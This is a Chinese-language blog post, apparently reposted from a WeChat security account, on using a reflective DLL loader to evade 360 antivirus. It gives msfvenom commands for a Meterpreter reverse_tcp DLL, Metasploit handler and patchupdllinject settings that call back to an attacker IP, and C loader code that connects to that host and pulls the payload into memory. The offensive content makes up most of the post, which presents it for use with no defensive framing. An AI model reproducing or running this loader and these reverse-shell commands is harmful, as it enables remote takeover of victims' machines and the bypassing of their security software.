先看效果图
十年前的老技术了,但可作为一个炮灰马上线,后续的操作仍然需要进行改良
配置msf
在生成客户端之前首先要将dll文件生成和msf的payload监听设置好
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.109.135 LPORT=10010 -f dll -o yy.dll
#生成dll文件
生成好dll文件后接着配置msf的监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.109.135
msf6 exploit(multi/handler) > set lport 10010
msf6 exploit(multi/handler) > exploit -j
#在 meterpreter/reverse_tcp 的 payload 中, 我们要把会连的ip和port设置成msfvenom生成dll指定的地址和端口,这样dll在执行的时候才能回连
msf6 exploit(multi/handler) > set payload windows/patchupdllinject/reverse_tcp
msf6 exploit(multi/handler) > set Dll ~/Desktop/yy.dll
msf6 exploit(multi/handler) > set LPORT 10086
msf6 exploit(multi/handler) > exploit -j
#这段是让客户端获取dll所设置
最后执行payload,通过jobs可以看到存在都在后台监听
然后用loader生成相应的客户端运行
以下是代码部分函数:
BOOL GetPEDLL() {
DWORD dwError;
WORD sockVersion = MAKEWORD(2, 2);
WSADATA wsaData;
SOCKET socks;
SHORT sListenPort = 10086;
struct sockaddr_in sin;
if (WSAStartup(sockVersion, &wsaData) != 0)
{
dwError = GetLastError();
printf("[*]WSAStarup Error : %d n", dwError);
return FALSE;
}
socks = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (socks == INVALID_SOCKET)
{
dwError = GetLastError();
printf("[*]Socket Error : %d n", dwError);
return FALSE;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(sListenPort);
sin.sin_addr.S_un.S_addr = inet_addr("192.168.109.135");
if (connect(socks, (struct sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
{
dwError = GetLastError();
printf("[*]Bind Error : %d n", dwError);
return FALSE;
}
int ret = 0;
ret = recv(socks, (PCHAR)bFileBuffer, 4, NULL);
ret = recv(socks, (PCHAR)bFileBuffer, 2650, NULL);//中断
ret = recv(socks, (PCHAR)bFileBuffer, 4, NULL);
ret = recv(socks, (PCHAR)bFileBuffer, 4, NULL);
ret = recv(socks, (PCHAR)bFileBuffer, 4, NULL);
ZeroMemory(bFileBuffer, PAYLOAD_SIZE);
ret = recv(socks, (PCHAR)bFileBuffer, PAYLOAD_SIZE, NULL);
if (ret > 0)
{
closesocket(socks);
}
return TRUE;
}
完整代码已上传到知识星球
原文始发于微信公众号(CatalyzeSec):【免杀】反射DLL过360
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论